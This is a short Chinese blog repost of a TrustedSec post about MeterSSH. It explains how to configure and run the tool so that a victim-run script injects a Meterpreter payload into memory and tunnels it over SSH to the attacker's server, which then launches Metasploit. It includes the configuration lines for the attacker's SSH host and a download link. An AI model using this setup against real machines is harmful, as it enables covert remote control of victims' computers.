from:https://www.trustedsec.com/november-2014/meterssh-meterpreter-ssh/
meterssh很易用–只要编辑meterssh.py文件并添加您的SSH服务器IP,端口,用户名,密码,,然后运行脚本。它将通过内存注入孵化出一个meterpreter(在我这,是Windows / meterpreter / bind_tcp)并绑定到端口8021。
这里我们启动初始的 meterssh payload:
接下来启动 monitor.py 监控有没有ssh连接,然后自动为你启动Metasploit. 一旦检测到 SSH connection 与shell 它会为你弹出 Metasploit :
接下来, Metasploit 启动 注意点我们通过localhost连接受害者.
这有2个文件。 monitor.py 和 meterssh.py.
monitor.py– 监听一个 SSH 连接, 它会绑到8021,然后启动metersploit.
meterssh.py– 受害者运行,也可以是py2exe 需要安装python或 pyinstaller打包好的exe.
meterssh.py中需要自己调整的
user = “sshuser”# password for SSHpassword = “sshpw”# this is where your SSH server is runningrhost = “192.168.1.1”# remote SSH port – this is the attackers SSH serverport = “22”
上面都填攻击者的信息。
从这下载:https://github.com/trustedsec/meterssh
———–
最新消息,在我的win8上失败了…这玩意靠谱吗?
捕捉最后的流星,坐在最高的山顶上,可以听音乐,聊电影,
